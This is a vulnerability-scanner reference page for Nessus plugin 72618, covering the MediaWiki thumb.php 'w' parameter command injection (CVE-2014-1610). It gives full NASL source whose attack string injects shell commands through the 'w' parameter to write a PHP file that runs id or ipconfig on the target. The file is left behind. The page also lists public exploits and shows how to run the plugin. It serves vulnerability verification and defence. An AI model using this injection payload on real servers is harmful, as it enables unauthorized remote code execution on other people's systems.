MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection - Nessus
High Plugin ID: 72618This page contains detailed information about the MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 72618
Name: MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection
Filename: mediawiki_thumb_rce.nasl
Vulnerability Published: 2014-01-28
This Plugin Published: 2014-02-21
Last Modification Time: 2022-04-11
Plugin Version: 1.12
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
mediawiki_detect.nasl, os_fingerprint.nasl
Required KB Items [?]: installed_sw/MediaWiki, www/PHP
Vulnerability Information
Severity: High
Vulnerability Published: 2014-01-28
Patch Published: 2014-01-28
CVE [?]: CVE-2014-1610
CPE [?]: cpe:/a:mediawiki:mediawiki
Synopsis
The remote web server contains an application that is affected by a remote command injection vulnerability.
Description
The version of MediaWiki running on the remote host is affected by a remote command injection vulnerability due to a failure to properly sanitize user-supplied input to the 'w' parameter in the 'thumb.php' script. A remote, unauthenticated attacker can exploit this issue to execute arbitrary commands and/or execute arbitrary code on the remote host.
Note that the application is also affected by an additional command injection issue. However, Nessus has not tested for this additional issue.
Note also that PDF file upload support and the PdfHandler extension must be enabled in order to exploit this issue.
Solution
Upgrade to MediaWiki 1.19.11 / 1.21.5 / 1.22.2 or later, and update the PdfHandler extension to the latest available version.
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Core Impact, D2 Elliot)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection vulnerability:
- Metasploit: exploit/multi/http/mediawiki_thumb
[MediaWiki Thumb.php Remote Command Execution] - Exploit-DB: exploits/multiple/remote/31767.rb
[EDB-31767: MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)] - Exploit-DB: exploits/multiple/webapps/31329.txt
[EDB-31329: MediaWiki 1.22.1 PdfHandler - Remote Code Execution] - D2 Elliot: mediawiki_thumb.php_page_parameter_remote_shell_command_injection.html
[MediaWiki thumb.php page Parameter Remote Shell Command Injection]
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS Score Source [?]: CVE-2014-1610
CVSS V2 Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P/E:F/RL:OF/RC:C
| CVSS Base Score: | 6.0 (Medium) |
| Impact Subscore: | 6.4 |
| Exploitability Subscore: | 6.8 |
| CVSS Temporal Score: | 5.0 (Medium) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 5.0 (Medium) |
| CVSS Base Score: | 8.8 (High) |
| Impact Subscore: | 5.9 |
| Exploitability Subscore: | 2.8 |
| CVSS Temporal Score: | 8.2 (High) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 8.2 (High) |
Go back to menu.
Plugin Source
This is the mediawiki_thumb_rce.nasl nessus plugin source code. This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(72618);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2014-1610");
script_bugtraq_id(65223);
script_xref(name:"EDB-ID", value:"31329");
script_name(english:"MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an application that is affected by a
remote command injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of MediaWiki running on the remote host is affected by a
remote command injection vulnerability due to a failure to properly
sanitize user-supplied input to the 'w' parameter in the 'thumb.php'
script. A remote, unauthenticated attacker can exploit this issue to
execute arbitrary commands and/or execute arbitrary code on the remote
host.
Note that the application is also affected by an additional command
injection issue. However, Nessus has not tested for this additional
issue.
Note also that PDF file upload support and the PdfHandler extension
must be enabled in order to exploit this issue.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2014/Feb/6");
# https://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f8ca1fc8");
script_set_attribute(attribute:"see_also", value:"https://www.mediawiki.org/wiki/Release_notes/1.19");
script_set_attribute(attribute:"see_also", value:"https://www.mediawiki.org/wiki/Release_notes/1.21");
script_set_attribute(attribute:"see_also", value:"https://www.mediawiki.org/wiki/Release_notes/1.22");
# https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?92483abd");
script_set_attribute(attribute:"solution", value:
"Upgrade to MediaWiki 1.19.11 / 1.21.5 / 1.22.2 or later, and update
the PdfHandler extension to the latest available version.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-1610");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"MediaWiki thumb.php page Parameter Remote Shell Command Injection");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'MediaWiki Thumb.php Remote Command Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/01/28");
script_set_attribute(attribute:"patch_publication_date", value:"2014/01/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/02/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:mediawiki:mediawiki");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("mediawiki_detect.nasl", "os_fingerprint.nasl");
script_require_keys("installed_sw/MediaWiki", "www/PHP");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
include("url_func.inc");
app = "MediaWiki";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
# Variables
file = NULL;
url = "/images";
function pdf_chk(string)
{
local_var item, file;
item = eregmatch(pattern:'\\<a href="(.*\\.pdf)"', string:string);
if (isnull(item)) return NULL;
file = item[1];
return file;
}
function d_listing(string)
{
local_var matches, match, item, subdir, subdirs, pat;
subdirs = make_list();
pat = 'alt="\\[DIR\\]"\\>.*\\<a href="([^/].*/)"\\>';
if (egrep(pattern:"\<title\>Index of (.*)", string:string))
{
matches = egrep(pattern:pat, string:string);
if (matches)
{
foreach match (split(matches))
{
item = eregmatch(pattern:pat, string:match);
if (!isnull(item))
{
subdir = item[1];
if (subdir == "temp/") continue; #Ignore temp directory
subdirs = make_list(subdirs, subdir);
}
}
}
}
return subdirs;
}
# Check /images for a directory listing and find an existing PDF
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url,
exit_on_fail : TRUE,
follow_redirect : 1
);
if (egrep(pattern:"\<title\>Index of (.*)/images\</title\>", string:res[2]))
{
file = pdf_chk(string:res[2]);
# Get a list of directories and traverse each to look for a PDF
# Only go 3 levels deep
if (isnull(file))
{
subdirs = d_listing(string:res[2]);
foreach d1 (subdirs)
{
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url + "/" + d1,
exit_on_fail : TRUE
);
if (!isnull(res[2]))
file = pdf_chk(string:res[2]);
if (!isnull(file)) break;
subdirs2 = d_listing(string:res[2]);
foreach d2 (subdirs2)
{
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url + "/" + d1 + d2,
exit_on_fail : TRUE
);
if (!isnull(res[2]))
file = pdf_chk(string:res[2]);
if (!isnull(file)) break;
subdirs3 = d_listing(string:res[2]);
foreach d3 (subdirs3)
{
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url + "/" + d1 + d2 + d3,
exit_on_fail : TRUE
);
if (!isnull(res[2]))
file = pdf_chk(string:res[2]);
if (!isnull(file)) break;
}
if (!isnull(file)) break;
}
if (!isnull(file)) break;
}
}
}
if (isnull(file))
exit(0, "No PDF files were found in " + install_url + url);
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ipconfig /all';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');
cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";
exp_file = SCRIPT_NAME - ".nasl" + "-" + unixtime();
r = 0;
foreach cmd (cmds)
{
exp_file += r;
if (cmd == "id")
attack = '/thumb.php?f=' +file+ '&w=5|`echo "<?php system(id);' +
'echo(\\"path=\\"); system(pwd);">images/' +exp_file+ '.php`';
else
{
attack = '/thumb.php?f=' +file+ '&w=5|echo "<?php echo(' + "'<pre>');" +
"system('ipconfig /all');system('dir " +exp_file+ ".php');" +
'//">images/' +exp_file+ ".php";
}
attack = urlencode(
str : attack,
unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234" +
"56789=+&|.?`;/()-_"
);
res = http_send_recv3(
method : "GET",
port : port,
item : dir + attack,
exit_on_fail : TRUE
);
if ("<h1>Error generating thumbnail</h1>" >< res[2])
{
res = http_send_recv3(
method : "GET",
port : port,
item : dir + url + "/" + exp_file + ".php",
exit_on_fail : TRUE
);
if (egrep(pattern:cmd_pats[cmd], string:res[2]))
{
if (cmd == "id")
{
pwd = strstr(res[2], "path");
output = res[2] - pwd;
path = chomp(pwd - "path=");
break;
}
else
{
output = strstr(res[2], "Windows IP");
item = eregmatch(pattern:"Directory of (.*)", string:res[2]);
if (!isnull(item))
{
path = chomp(item[1]);
pos = stridx(output, "Volume in drive");
output = substr(output, 0, pos - 1);
break;
}
}
break;
}
}
r++;
}
if (strlen(output) > 0)
{
security_report_v4(
port : port,
severity : SECURITY_WARNING,
cmd : cmd,
request : make_list(install_url + attack, install_url + url + "/" + exp_file + ".php"),
output : chomp(output),
rep_extra :
'\nNote: This file has not been removed by Nessus and will need to'+
'\nbe manually deleted (' +path+ ').'
);
exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/mediawiki_thumb_rce.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\mediawiki_thumb_rce.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/mediawiki_thumb_rce.nasl
Go back to menu.
How to Run
Here is how to run the MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection plugin ID 72618.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl mediawiki_thumb_rce.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a mediawiki_thumb_rce.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - mediawiki_thumb_rce.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state mediawiki_thumb_rce.nasl -t <IP/HOST>Go back to menu.
References
BID | SecurityFocus Bugtraq ID: See also:
- https://www.tenable.com/plugins/nessus/72618
- https://seclists.org/fulldisclosure/2014/Feb/6
- https://www.mediawiki.org/wiki/Release_notes/1.19
- https://www.mediawiki.org/wiki/Release_notes/1.21
- https://www.mediawiki.org/wiki/Release_notes/1.22
- http://www.nessus.org/u?92483abd
- http://www.nessus.org/u?f8ca1fc8
- https://vulners.com/nessus/MEDIAWIKI_THUMB_RCE.NASL
- 73256 - Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities
- 72376 - Fedora 20 : mediawiki-1.21.5-1.fc20 (2014-1745)
- 72379 - Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)
- 81227 - GLSA-201502-04 : MediaWiki: Multiple vulnerabilities
- 73004 - Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)
- 72215 - MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities
- 79907 - Fedora 19 : mediawiki-1.23.7-1.fc19 (2014-16020)
- 80289 - Fedora 20 : mediawiki-1.23.8-1.fc20 (2014-17228)
- 80293 - Fedora 19 : mediawiki-1.23.8-1.fc19 (2014-17264)
- 74412 - Fedora 19 : mediawiki-1.21.10-1.fc19 (2014-6962)
- 76375 - Fedora 20 : mediawiki-1.21.11-1.fc20 (2014-7779)
- 76376 - Fedora 19 : mediawiki-1.21.11-1.fc19 (2014-7805)
- 149344 - Debian DLA-2648-2 : mediawiki regression update
- 153966 - Debian DLA-2779-1 : mediawiki - LTS security update
- 104588 - Debian DSA-4036-1 : mediawiki - security update
- 125858 - Debian DSA-4460-1 : mediawiki - security update
- 132423 - Debian DSA-4592-1 : mediawiki - security update
- 148441 - Debian DSA-4889-1 : mediawiki - security update
- 153862 - Debian DSA-4979-1 : mediawiki - security update
- 35265 - Fedora 8 : mediawiki-1.13.3-41.99.fc8 (2008-11688)
- 36263 - Fedora 10 : mediawiki-1.13.3-42.fc10 (2008-11743)
- 35267 - Fedora 9 : mediawiki-1.13.3-42.fc9 (2008-11802)
- 100184 - Fedora 25 : mediawiki (2017-2643ef1cad)
- 99408 - Fedora 25 : mediawiki (2017-3fb95ed01f)
- 104693 - FreeBSD : mediawiki -- multiple vulnerabilities (298829e2-ccce-11e7-92e4-000c29649f92)
- 126485 - FreeBSD : mediawiki -- multiple vulnerabilities (3c5a4fe0-9ebb-11e9-9169-fcaa147e860e)
- 35243 - FreeBSD : mediawiki -- multiple vulnerabilities (61b07d71-ce0e-11dd-a721-0030843d3802)
- 156986 - GLSA-202107-40 : MediaWiki: Multiple vulnerabilities
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file mediawiki_thumb_rce.nasl version 1.12. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
